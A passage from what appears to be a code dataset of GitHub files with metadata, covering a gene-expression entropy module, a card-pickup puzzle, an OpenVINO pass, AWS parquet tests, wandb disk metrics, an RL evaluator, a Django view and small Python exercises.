Constitutive gene ###\n\n\"\"\" Shannon entropy for a constitutive gene with mean expression N.\n\n oo n\n ⎛N⎞ \\⎺⎺⎺` ⎛N -N ⎞\n H = -N⋅log₂⎜─⎟ + ⟩ ⎜──⋅e ⋅log₂(n!)⎟\n ⎝e⎠ /⎽⎽⎽, ⎝n! ⎠\n n = 0\n\"\"\"\nH_poisson_const = -N*log2(N/E)\nH_poisson_sum_term = N**n / factorial(n) * exp(-N) * log2(factorial(n))\nH_poisson_sum = Sum(H_poisson_sum_term, (n, 0, oo))\nsymbolic_H['constitutive'] = H_poisson_const + H_poisson_sum\n\n@utils.memoized\ndef H_constitutive(N, precision=mpmath.mp.dps):\n \"\"\"Shannon entropy for the constitutive gene model.\n\n :N: mean number of proteins\n :precision: {precision}\n :returns: entropy of a gene with parameter 'N'\n \"\"\"\n return symbolic_H['constitutive'].evalf(precision, subs={'N': N})\n\n\n### Binary gene ###\n\n# Auxiliary expressions for parallel computation on SymPy.\nparallel_H = {}\nparallel_n = i*N_PROCESSES + c # i: index; c: constant\n\n\n## External Regulation Gene ##\n\n\"\"\" Shannon entropy for the binary stochastic gene model.\n\n ∞\n H = - ∑ φₙ⋅log₂(φₙ)\n n=0\n\"\"\"\n\nH_external_sum_term = phi_n_external*log2(phi_n_external)\nsymbolic_H['external'] = -Sum(H_external_sum_term, (n, 0, oo))\nparallel_H['external'] = -Sum(H_external_sum_term.subs(n, parallel_n), (i, 0, oo))\n\ndef H_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Shannon entropy for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: shannon entropy of gene with parameters ε, pₐ and N\n \"\"\"\n subs = {'epsilon': epsilon, 'p_a': palpha, 'N': N}\n return _H_dispatch('external', subs, k, precision, method, backup_method)\n\n\n\"\"\"Shannon entropy of the number of proteins conditional to the promoter state being ON or OFF.\n\n oo\n \\⎺⎺⎺` αₙ ⎛αₙ⎞\n H = - ⟩ ──⋅log₂⎜──⎟\n ON /⎽⎽⎽, pₐ ⎝pₐ⎠\n n = 0\n\"\"\"\n\nH_ON_external_sum_term = alpha_n_external/palpha*log2(alpha_n_external/palpha)\nsymbolic_H['ON_external'] = -Sum(H_ON_external_sum_term, (n, 0, oo))\nparallel_H['ON_external'] = -Sum(H_ON_external_sum_term.subs(n, parallel_n), (i, 0, oo))\n\ndef H_ON_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Entropy conditional to ON state for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: shannon entropy of the distribution given the promoter is at ON state\n \"\"\"\n subs = {'epsilon': epsilon, 'p_a': palpha, 'N': N}\n return _H_dispatch('ON_external', subs, k, precision, method, backup_method)\n\nH_OFF_external_sum_term = beta_n_external/(1 - palpha)*log2(beta_n_external/(1 - palpha))\nsymbolic_H['OFF_external'] = -Sum(H_OFF_external_sum_term, (n, 0, oo))\nparallel_H['OFF_external'] = -Sum(H_OFF_external_sum_term.subs(n, parallel_n), (i, 0, oo))\n\ndef H_OFF_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Entropy conditional to OFF state for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: shannon entropy of the distribution given the promoter is at OFF state\n \"\"\"\n subs = {'epsilon': epsilon, 'p_a': palpha, 'N': N}\n return _H_dispatch('OFF_external', subs, k, precision, method, backup_method)\n\n\n\"\"\"Mutual information for the externally regulated gene model.\n\n ⎛ ⎞\n I(X; Y) = H(X) - H(X|Y) = H - ⎜pₐ⋅H + (1-pₐ)⋅H ⎟\n ⎝ ON OFF⎠\n\"\"\"\n\nclass IAsyncResult(pool.AsyncResult):\n \"\"\"Wrapper to multiple AsyncResult's\"\"\"\n def __init__(self, palpha, hs):\n self.palpha = palpha\n is_async = (isinstance(res, pool.AsyncResult) for res in hs)\n self.results = tuple(zip(hs, is_async))\n\n def ready(self):\n return all(not is_async or res.ready() for res, is_async in self.results)\n\n def successful(self):\n return all(not is_async or res.successful() for res, is_async in self.results)\n\n def wait(self, timeout=None):\n for res, is_async in self.results:\n if is_async:\n res.wait(timeout)\n\n def get(self, timeout=None):\n h, h_on, h_off = (res.get(timeout) if is_async else res for res, is_async in self.results)\n return h - self.palpha*h_on - (1 - self.palpha)*h_off\n\ndef I_external(epsilon, palpha, N, k=oo, precision=mpmath.mp.dps, method='sympy-parallel', backup_method=None):\n \"\"\"Mutual information for the externally regulated gene model.\n\n :epsilon: {epsilon}\n :palpha: {palpha}\n :N: {N}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: mutual information of gene with parameters ε, pₐ and N\n \"\"\"\n h = H_external(epsilon, palpha, N, k, precision, method, backup_method)\n h_on = H_ON_external(epsilon, palpha, N, k, precision, method, backup_method)\n h_off = H_OFF_external(epsilon, palpha, N, k, precision, method, backup_method)\n hs = (h, h_on, h_off)\n\n if any(res is None for res in hs):\n return None\n elif any(isinstance(res, pool.AsyncResult) for res in hs):\n return IAsyncResult(palpha, hs)\n else:\n return h - palpha*h_on - (1 - palpha)*h_off\n\n\n### Internals ###\n\ndef _H_dispatch(func, subs, k, precision, method, backup_method):\n \"\"\"Backend calculation dispatcher.\n\n :func: {func}\n :subs: {subs}\n :k: {k}\n :precision: {precision}\n :method: {method}\n :backup_method: {backup_method}\n :returns: result of 'func' calculation using the required method(s)\n \"\"\"\n assert method in {'maple', 'maple-async', 'sympy', 'sympy-parallel'}\n if isinstance(backup_method, str):\n backup_method = [backup_method]\n\n elif method == 'maple':\n res = _H_maple(func, subs, k, precision)\n elif method == 'maple-async':\n # FIXME: avoid 'backup_method' bypass by a None returned later by an pool.AsyncResult.\n # Things should work in a program rerun since (some of) these None async results would be\n # already cached.\n res = global_pool().apply_async(_H_maple, [func, subs, k, precision])\n try:\n res = res.get(timeout=0.1)\n except mp.TimeoutError:\n return res\n\n else: # method is 'sympy' or 'sympy-parallel'\n res = _H_sympy(func, subs, k, precision, parallel=method.endswith('parallel'))\n\n if res is None and backup_method:\n log_msg = \"_H_dispatch: method '%s' failed, trying '%s' for '%s' with parameters %s\"\n logging.debug(log_msg, method, backup_method[0], func, str(subs))\n return _H_dispatch(func, subs, k, precision, method=backup_method[0], backup_method=backup_method[1:])\n\n return res\n\nmp_pool = None\ndef global_pool():\n \"\"\"Initialize pool of worker processes only when a function requires it.\"\"\"\n global mp_pool\n if mp_pool is None:\n mp_pool = mp.Pool(processes=N_PROCESSES)\n atexit.register(mp_pool.close)\n return mp_pool\n\ndef _map_evalf(arg):\n \"\"\"Auxiliary function for parallel numeric evaluation.\n\n :arg: 2-tuple with the variable x and the precision\n :returns: result equivalent to expr.evalf(x, n)\n \"\"\"\n return evalf(x=arg[0], n=arg[1])\n\n@utils.memoized\ndef _H_sympy(func, subs, k, precision, parallel):\n \"\"\"Calculate entropy in SymPy.\n\n :func: {func}\n :subs: {subs}\n :k: {k}\n :precision: {precision}\n :parallel: wether to run summation in parallel\n :returns: result of 'func' evaluation in SymPy with parameters in 'subs'\n \"\"\"\n expr = parallel_H[func] if parallel else symbolic_H[func]\n\n try:\n if not parallel:\n expr = expr.replace(oo, k)\n res = expr.evalf(precision, subs)\n if res == 0:\n raise RuntimeError\n else:\n # Parallel evaluation requires integers or fractions(?).\n expr = expr.subs({key: Rational(str(val)) for key, val in subs.items()})\n expr = expr.replace(oo, k/N_PROCESSES)\n args = [(expr.subs('c', c), precision) for c in range(N_PROCESSES)]\n partial_sums = global_pool().map(_map_evalf, args)\n if any(x == 0 for x in partial_sums):\n raise RuntimeError\n res = sum(partial_sums)\n if logging.getLogger().level >= logging.INFO:\n print(\".\", end=\"\", flush=True) # show progress\n return res\n\n # Note: NaN is stored as None (NULL) in diskcache (SQLite).\n except (RuntimeError, TypeError):\n logging.debug(\"_H_sympy: invalid result with precision = {}.\".format(precision))\n if precision >= 75:\n return None\n return _H_sympy(func, subs, k, precision + 15, parallel)\n except (mpmath.libmp.NoConvergence, ValueError):\n logging.debug(\"_H_sympy: convergence exception with parameters ε = %(epsilon)f, pₐ = %(p_a)f, N = %(N)d\", subs)\n return None\n\nroot = pathlib.Path(__file__).parent.resolve()\nmaple_external = root/'entropy_external.mpl'\n@utils.memoized()\ndef _H_maple(func, subs, k, precision):\n \"\"\"Calculate entropy using Maple.\n\n :func: {func}\n :subs: {subs}\n :k: {k}\n :precision: {precision}\n :returns: result of 'func' evaluation in Maple with parameters in 'subs'\n \"\"\"\n maple_func = 'H_' + func\n args = (maple_func, subs['epsilon'], subs['p_a'], subs['N'], precision)\n args = '-cp:=' + ','.join(str(a) for a in args)\n if not k is oo:\n args += ',' + str(k)\n logging.debug(\"_H_maple: calling Maple with command: %s %s\", maple_external, args)\n\n with sub.Popen([maple_external, args], stdout=sub.PIPE,\n start_new_session=True, universal_newlines=True) as proc:\n pgid = os.getpgid(proc.pid)\n\n # Maple subprocesses like to lie around forever... So we KILL it!\n @atexit.register\n def kill_maple(who='atexit'):\n try:\n os.killpg(pgid, signal.SIGKILL)\n logging.debug(\"%s: killing process group %d\", who, pgid)\n except ProcessLookupError:\n pass\n\n try:\n proc.wait(600)\n res = Float(proc.stdout.readline())\n if math.isnan(res):\n logging.debug(\"_H_sympy: invalid result with precision = {}.\".format(precision))\n if precision >= 75:\n return None\n return _H_maple(func, subs, k, precision + 15)\n except sub.TimeoutExpired:\n proc.terminate()\n res = None\n finally:\n atexit.unregister(kill_maple)\n kill_maple(who='_H_maple')\n\n if logging.getLogger().level >= logging.INFO:\n print(\".\", end=\"\", flush=True) # show progress\n return res\n\n\nfor func in (H_constitutive, H_external, H_ON_external, H_OFF_external, I_external, _H_dispatch, _H_maple, _H_C):\n func.__doc__ = func.__doc__.format(**DOC)\n","repo_name":"amphybio/stochastic-gene-expression","sub_path":"entropy2020/src/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":12868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5548263171","text":"def minimumCardPickup(cards):\n # Set to track if a card has already been visited\n s = set()\n \n maxValue = len(cards) + 1\n minCount = maxValue\n \n \n i,j = 0,0\n \n while j < len(cards):\n # If the card at index j is already in set that means we found a matching pair\n # So we can shrink the window until the element is still in set and also find the minimum length in each iteration\n if cards[j] in s:\n while cards[j] in s:\n minCount = min(minCount, j - i + 1)\n if cards[i] in s: s.discard(cards[i])\n i += 1\n \n # At this point, we are sure that card at index j is not in set so we can safely put it in set\n s.add(cards[j])\n j += 1\n \n return minCount if minCount != maxValue else -1\n\ncards = [3,4,2,3,4,7]\nminimumCards = minimumCardPickup(cards)\n\nprint(\"Minimum number of consecutive cards you have to pick up to have a pair of matching cards ->\", minimumCards)","repo_name":"itsarvindhere/Sliding-Window","sub_path":"025. Minimum Consecutive Cards to Pick Up/Cards.py","file_name":"Cards.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13022936419","text":"import numpy as np\n\nfrom mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\nfrom mo.ops.const import Const\n\n\nclass AnchorToPriorBoxes(MiddleReplacementPattern):\n \"\"\"\n Crop anchors consts before replacing subgraph with all anchors\n \"\"\"\n enabled = True\n force_clean_up = True\n graph_condition = [lambda graph: graph.graph['fw'] == 'mxnet' and graph.graph['cmd_params'].enable_ssd_gluoncv]\n\n def run_after(self):\n from extensions.middle.pass_separator import MiddleStart\n return [MiddleStart]\n\n def pattern(self):\n return dict(\n nodes=[\n ('const', dict(op='Const')),\n ('const_data', dict(kind='data')),\n ('slice_like', dict(op='Crop')),\n ('slice_like_out', dict(kind='data')),\n ('reshape', dict(op='Reshape')),\n ],\n edges=[\n ('const', 'const_data'),\n ('const_data', 'slice_like', {'in': 0}),\n ('slice_like', 'slice_like_out'),\n ('slice_like_out', 'reshape'),\n ]\n )\n\n def replace_pattern(self, graph: Graph, match: dict):\n slice_like = match['slice_like']\n anchor_node = slice_like.in_port(0).get_source().node\n reshape = slice_like.out_nodes()[0].out_node()\n slice_shape = slice_like.out_nodes()[0].shape\n anchor_node.value = np.copy(anchor_node.value[:slice_shape[0], :slice_shape[1],\n :slice_shape[2], :slice_shape[3], :slice_shape[4]])\n anchor_node.shape = slice_shape\n\n val_node = Const(graph, {'name': slice_like.name +'/croped_', 'value': anchor_node.value[:slice_shape[0], :slice_shape[1],\n :slice_shape[2], :slice_shape[3], :slice_shape[4]], 'shape': slice_shape}).create_node_with_data()\n slice_like.in_port(0).disconnect()\n slice_like.in_port(1).disconnect()\n slice_like.out_port(0).disconnect()\n reshape.in_port(0).connect(val_node.in_node().out_port(0))\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/middle/AnchorToPriorBox.py","file_name":"AnchorToPriorBox.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"70499255147","text":"\"\"\"Test the dataset module.\"\"\"\nimport os\nfrom typing import Iterator\nfrom uuid import uuid4\n\nimport awswrangler as wr\nimport pandas as pd\nimport pandera as pa\nimport pytest\n\nfrom aws_parquet.dataset import ParquetDataset\n\n\n@pytest.fixture\ndef schema() -> pa.DataFrameSchema:\n \"\"\"Create a schema.\"\"\"\n\n class MyDatasetSchemaModel(pa.SchemaModel):\n \"\"\"Schema for the dataset.\"\"\"\n\n col1: pa.typing.Series[int] = pa.Field(ge=0)\n col2: pa.typing.Series[pa.DateTime]\n col3: pa.typing.Series[float] = pa.Field(ge=0)\n col4: pa.typing.Series[pa.Category]\n col5: pa.typing.Series[pd.CategoricalDtype] = pa.Field(\n dtype_kwargs={\"categories\": [\"a\", \"b\", \"c\"]}\n )\n\n return MyDatasetSchemaModel.to_schema()\n\n\n@pytest.fixture\ndef dataset(schema: pa.DataFrameSchema) -> Iterator[ParquetDataset]:\n \"\"\"Create a dataset.\"\"\"\n table_name = str(uuid4()).replace(\"-\", \"\")\n bucket_name = os.environ[\"AWS_S3_BUCKET\"]\n\n dataset = ParquetDataset(\n database=\"default\",\n table=table_name,\n partition_cols=[\"col1\", \"col2\"],\n path=f\"s3://{bucket_name}/{table_name}/\",\n pandera_schema=schema,\n )\n\n yield dataset\n dataset.delete()\n\n\n@pytest.fixture\ndef df() -> pd.DataFrame:\n \"\"\"Create a dataframe.\"\"\"\n return pd.DataFrame(\n {\n \"col1\": [1, 2, 3],\n \"col2\": [\"2021-01-01\", \"2021-01-02\", \"2021-01-03\"],\n \"col3\": [1.0, 2.0, 3.0],\n \"col4\": [\"a\", \"b\", \"z\"],\n \"col5\": [\"a\", \"b\", \"c\"],\n }\n )\n\n\ndef test_dataset_create(dataset: ParquetDataset) -> None:\n \"\"\"Test the create method.\"\"\"\n dataset.create()\n assert wr.catalog.does_table_exist(database=dataset.database, table=dataset.table)\n\n with pytest.raises(Exception):\n dataset.create(if_exists=\"raise\")\n\n with pytest.warns(Warning):\n dataset.create(if_exists=\"warn\")\n\n\ndef test_dataset_update(\n dataset: ParquetDataset, schema: pa.DataFrameSchema, df: pd.DataFrame\n) -> None:\n \"\"\"Test the update method.\"\"\"\n dataset.create()\n dataset.update(df)\n out = dataset.read()\n assert out.equals(schema(df))\n\n\ndef test_dataset_read_partition(\n dataset: ParquetDataset, schema: pa.DataFrameSchema, df: pd.DataFrame\n) -> None:\n \"\"\"Test the read method.\"\"\"\n dataset.create()\n dataset.update(df)\n out = dataset.read(partition={\"col1\": \"1\", \"col2\": \"2021-01-01\"})\n assert out.equals(schema(df[(df[\"col1\"] == 1) & (df[\"col2\"] == \"2021-01-01\")]))\n\n\ndef test_dataset_delete_partition(\n dataset: ParquetDataset, schema: pa.DataFrameSchema, df: pd.DataFrame\n) -> None:\n \"\"\"Test the delete method.\"\"\"\n dataset.create()\n dataset.update(df)\n dataset.delete(partition={\"col1\": \"1\", \"col2\": \"2021-01-01\"})\n out = dataset.read()\n assert out.equals(\n schema(df[~((df[\"col1\"] == 1) & (df[\"col2\"] == \"2021-01-01\"))]).reset_index(\n drop=True\n )\n )\n\n dataset.update(df, overwrite=True)\n dataset.delete(partition={\"col2\": \"2021-01-01\"})\n out = dataset.read()\n assert out.equals(schema(df[~(df[\"col2\"] == \"2021-01-01\")]).reset_index(drop=True))\n","repo_name":"marwan116/aws-parquet","sub_path":"tests/test_dataset.py","file_name":"test_dataset.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"8396529321","text":"import threading\nfrom collections import deque\nfrom typing import TYPE_CHECKING, List, Optional\n\ntry:\n import psutil\nexcept ImportError:\n psutil = None\n\nfrom wandb.errors.term import termwarn\n\nfrom .aggregators import aggregate_mean\nfrom .asset_registry import asset_registry\nfrom .interfaces import Interface, Metric, MetricsMonitor\n\nif TYPE_CHECKING:\n from typing import Deque\n\n from wandb.sdk.internal.settings_static import SettingsStatic\n\n\nclass DiskUsagePercent:\n \"\"\"Total system disk usage in percent.\"\"\"\n\n name = \"disk.{path}.usagePercent\"\n samples: \"Deque[List[float]]\"\n\n def __init__(self, paths: List[str]) -> None:\n self.samples = deque([])\n # check if we have access to the disk paths:\n self.paths: List[str] = []\n for path in paths:\n try:\n psutil.disk_usage(path)\n self.paths.append(path)\n except Exception as e: # noqa\n termwarn(f\"Could not access disk path {path}: {e}\", repeat=False)\n\n def sample(self) -> None:\n # self.samples.append(psutil.disk_usage(\"/\").percent)\n disk_usage: List[float] = []\n for path in self.paths:\n disk_usage.append(psutil.disk_usage(path).percent)\n if disk_usage:\n self.samples.append(disk_usage)\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n disk_metrics = {}\n for i, _path in enumerate(self.paths):\n aggregate_i = aggregate_mean([sample[i] for sample in self.samples])\n # ugly hack to please the frontend:\n _path = _path.replace(\"/\", \"\\\\\")\n disk_metrics[self.name.format(path=_path)] = aggregate_i\n\n return disk_metrics\n\n\nclass DiskUsage:\n \"\"\"Total system disk usage in GB.\"\"\"\n\n name = \"disk.{path}.usageGB\"\n samples: \"Deque[List[float]]\"\n\n def __init__(self, paths: List[str]) -> None:\n self.samples = deque([])\n # check if we have access to the disk paths:\n self.paths: List[str] = []\n for path in paths:\n try:\n psutil.disk_usage(path)\n self.paths.append(path)\n except Exception as e: # noqa\n termwarn(f\"Could not access disk path {path}: {e}\", repeat=False)\n\n def sample(self) -> None:\n disk_usage: List[float] = []\n for path in self.paths:\n disk_usage.append(psutil.disk_usage(path).used / 1024 / 1024 / 1024)\n if disk_usage:\n self.samples.append(disk_usage)\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n disk_metrics = {}\n for i, _path in enumerate(self.paths):\n aggregate_i = aggregate_mean([sample[i] for sample in self.samples])\n # ugly hack to please the frontend:\n _path = _path.replace(\"/\", \"\\\\\")\n disk_metrics[self.name.format(path=_path)] = aggregate_i\n\n return disk_metrics\n\n\nclass DiskIn:\n \"\"\"Total system disk read in MB.\"\"\"\n\n name = \"disk.in\"\n samples: \"Deque[float]\"\n\n def __init__(self) -> None:\n self.samples = deque([])\n self.read_init: Optional[int] = None\n\n def sample(self) -> None:\n if self.read_init is None:\n # initialize the read_init value on first sample\n self.read_init = psutil.disk_io_counters().read_bytes\n self.samples.append(\n (psutil.disk_io_counters().read_bytes - self.read_init) / 1024 / 1024\n )\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n aggregate = aggregate_mean(self.samples)\n return {self.name: aggregate}\n\n\nclass DiskOut:\n \"\"\"Total system disk write in MB.\"\"\"\n\n name = \"disk.out\"\n samples: \"Deque[float]\"\n\n def __init__(self) -> None:\n self.samples = deque([])\n self.write_init: Optional[int] = None\n\n def sample(self) -> None:\n if self.write_init is None:\n # init on first sample\n self.write_init = psutil.disk_io_counters().write_bytes\n self.samples.append(\n (psutil.disk_io_counters().write_bytes - self.write_init) / 1024 / 1024\n )\n\n def clear(self) -> None:\n self.samples.clear()\n\n def aggregate(self) -> dict:\n if not self.samples:\n return {}\n aggregate = aggregate_mean(self.samples)\n return {self.name: aggregate}\n\n\n@asset_registry.register\nclass Disk:\n def __init__(\n self,\n interface: \"Interface\",\n settings: \"SettingsStatic\",\n shutdown_event: threading.Event,\n ) -> None:\n self.name = self.__class__.__name__.lower()\n self.settings = settings\n self.metrics: List[Metric] = [\n DiskUsagePercent(list(settings._stats_disk_paths or [\"/\"])),\n DiskUsage(list(settings._stats_disk_paths or [\"/\"])),\n DiskIn(),\n DiskOut(),\n ]\n self.metrics_monitor = MetricsMonitor(\n self.name,\n self.metrics,\n interface,\n settings,\n shutdown_event,\n )\n\n @classmethod\n def is_available(cls) -> bool:\n \"\"\"Return a new instance of the CPU metrics.\"\"\"\n return psutil is not None\n\n def probe(self) -> dict:\n disk_paths = list(self.settings._stats_disk_paths or [\"/\"])\n disk_metrics = {}\n for disk_path in disk_paths:\n try:\n # total disk space in GB:\n total = psutil.disk_usage(disk_path).total / 1024 / 1024 / 1024\n # total disk space used in GB:\n used = psutil.disk_usage(disk_path).used / 1024 / 1024 / 1024\n disk_metrics[disk_path] = {\n \"total\": total,\n \"used\": used,\n }\n except Exception as e: # noqa\n termwarn(f\"Could not access disk path {disk_path}: {e}\", repeat=False)\n\n return {self.name: disk_metrics}\n\n def start(self) -> None:\n self.metrics_monitor.start()\n\n def finish(self) -> None:\n self.metrics_monitor.finish()\n","repo_name":"wandb/wandb","sub_path":"wandb/sdk/internal/system/assets/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"8690799018","text":"from plotly.graph_objs import Scatter, Line\nfrom utils.torchs import *\nimport numpy as np\nimport plotly\nimport os\n\n\nclass ActorCriticEvaluator(object):\n def __init__(self, agent, cfg, policy=None):\n self.agent = agent\n self.cfg = cfg\n self.log = None\n self.summary_dir = None\n\n # get some components from the agent\n self.env_factory = self.agent.env_factory\n self.tensor = self.agent.tensor\n self.policy = policy if policy else self.agent.policy\n self.id = self.agent.id\n\n # parameters for evaluation\n self.num_epsd = cfg[\"num_epsd\"] if \"num_epsd\" in cfg else 10\n self.max_epsd_iters = cfg[\"max_epsd_iters\"] if \"max_epsd_iters\" in cfg else 10000\n self.eval_iters = []\n self.eval_rewards = [np.zeros(self.num_epsd)] # elements are numpy array\n self.best_avg_rewards = -np.inf\n self.eval_env = self.env_factory(3333)\n self.gpu = cfg[\"gpu\"] if \"gpu\" in cfg else False\n\n def set_logger(self, log):\n self.log = log\n if not self.log.ready_for_test:\n self.log.prepare_for_test()\n self.summary_dir = self.log.task.summary_dir\n\n def place_models_on_cpu(self):\n self.agent.place_models_on_cpu()\n\n def place_models_on_gpu(self):\n self.agent.place_models_on_gpu()\n\n def eval(self, iter_i, viz=False):\n assert self.log is not None\n if use_gpu and self.gpu:\n self.place_models_on_cpu()\n\n avg_rewards, eval_rewards = self._eval(self.num_epsd)\n\n if use_gpu and self.gpu:\n self.place_models_on_gpu()\n\n self.eval_iters.append(iter_i)\n self.eval_rewards.append(eval_rewards)\n title = \"Test Rewards of \" + self.id\n if viz:\n population_plot(self.eval_iters, self.eval_rewards, title, self.summary_dir)\n return {'ravg': avg_rewards, 'rs': eval_rewards}\n\n def _eval(self, num_epsd):\n total_rewards = np.zeros(num_epsd)\n epsd_idx = 0\n epsd_iters = 0\n state = self.eval_env.reset()\n while epsd_idx < num_epsd:\n if self.agent.running_state is not None:\n state = self.agent.running_state(state, update=False)\n\n state_var = self.agent.tensor(state).unsqueeze(0)\n action = self.policy.select_action(state_var)\n next_state, reward, done, _ = self.eval_env.step(action)\n total_rewards[epsd_idx] += reward\n epsd_iters += 1\n state = next_state\n\n if done or epsd_iters >= self.max_epsd_iters:\n # print('>>> Eval: [%2d/%d], rewards: %s' % (epsd_idx + 1, num_epsd, total_rewards[epsd_idx]))\n\n if epsd_idx < num_epsd - 1: # leave last reset to next run\n state = self.eval_env.reset()\n\n epsd_idx += 1\n epsd_iters = 0\n\n avg_rewards = total_rewards.mean()\n # print('>>> Eval: avg total rewards: %s' % avg_rewards)\n return avg_rewards, total_rewards\n\n\ndef population_plot(xs, ys, title, path):\n \"\"\"Plots min, max and mean + standard deviation bars of a population over time.\n\n Parameters\n ----------\n xs: iterations, list or numpy array, shape (N, )\n ys: sum of rewards, list or numpy array, shape (N, num_epsd)\n title: figure title\n path: saving dir\n \"\"\"\n max_colour, mean_colour, std_colour = 'rgb(0, 132, 180)', 'rgb(0, 172, 237)', 'rgba(29, 202, 255, 0.2)'\n\n xs, ys = np.array(xs), np.array(ys)\n ys_min, ys_max = ys.min(1).squeeze(), ys.max(1).squeeze()\n ys_mean, ys_std = ys.mean(1).squeeze(), ys.std(1).squeeze()\n ys_upper, ys_lower = ys_mean + ys_std, ys_mean - ys_std\n\n trace_max = Scatter(x=xs, y=ys_max, line=Line(color=max_colour, dash='dash'), name='Max')\n trace_upper = Scatter(x=xs, y=ys_upper, line=Line(color='transparent'),\n name='+1 Std. Dev.', showlegend=False)\n trace_mean = Scatter(x=xs, y=ys_mean, fill='tonexty',\n fillcolor=std_colour, line=Line(color=mean_colour), name='Mean')\n trace_lower = Scatter(x=xs, y=ys_lower, fill='tonexty',\n fillcolor=std_colour, line=Line(color='transparent'),\n name='-1 Std. Dev.', showlegend=False)\n trace_min = Scatter(x=xs, y=ys_min, line=Line(color=max_colour, dash='dash'), name='Min')\n\n plotly.offline.plot({\n 'data': [trace_upper, trace_mean, trace_lower, trace_min, trace_max],\n 'layout': dict(title=title, xaxis={'title': 'Iteration'}, yaxis={'title': title})\n }, filename=os.path.join(path, title + '.html'), auto_open=False)\n","repo_name":"lx10077/rlpy","sub_path":"core/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32049131725","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom .models import Configuracoes\nfrom contas.models import Usuario\n\ndef nova_tecnica(request, username):\n\n usuario = get_object_or_404(Usuario, username=username)\n\n if request.method == 'POST':\n\n configuracoes = Configuracoes.objects.last()\n\n tecnicas = configuracoes.tecnicas\n\n ultima_tecnica_registrada = list(tecnicas.keys())[-1]\n\n separador = ultima_tecnica_registrada.find(\"_\")\n\n chave_proxima_tecnica = f'tecnica_{int(ultima_tecnica_registrada[(separador + 1):]) + 1}'\n\n nova_tecnica = request.POST['nova_tecnica']\n\n tecnicas[chave_proxima_tecnica] = nova_tecnica\n\n configuracoes.save()\n\n return redirect(reverse('cria_equipamento', args=[usuario.username]))\n","repo_name":"gustavofisica/cme","sub_path":"apps/configuracoes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6203052053","text":"from turtle import *\n\ndef levi(l, n):\n if n == 0:\n down()\n forward(l)\n else:\n a = left(45), levi(l/(2**0.5), n-1), right(90), levi(l/(2**0.5), n-1), left(45)\n return a\n\n\ndef main():\n l = int(input('Длина стороны:'))\n n = int(input('Глубина рекурсии:'))\n levi(l, n)\n speed(100)\n mainloop()\n\n\nif __name__ == '__main__':\n main()","repo_name":"MAXIMZOLOTYKH11/case__3","sub_path":"Levi.py","file_name":"Levi.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759016684","text":"#!/usr/bin/python3\n\n# Returns a tuple with the length of a str and its first char\n\ndef multiple_returns(sentence):\n length = len(sentence)\n if length == 0:\n result = (0, None)\n return result\n else:\n res = (length, sentence[0:1])\n return res\n","repo_name":"JI-Maina/alx-higher_level_programming","sub_path":"0x03-python-data_structures/8-multiple_returns.py","file_name":"8-multiple_returns.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18636743211","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n oldToNew = {}\n p = head\n while p:\n n = Node(p.val)\n oldToNew[p] = n\n p = p.next\n oldToNew[None] = None\n \n p = head\n while p:\n n = oldToNew[p]\n n.next = oldToNew[p.next]\n n.random = oldToNew[p.random]\n p = p.next\n \n return oldToNew[head]\n ","repo_name":"Mihir-1/LeetCode-Algorithms","sub_path":"138-copy-list-with-random-pointer/138-copy-list-with-random-pointer.py","file_name":"138-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73020301226","text":"# 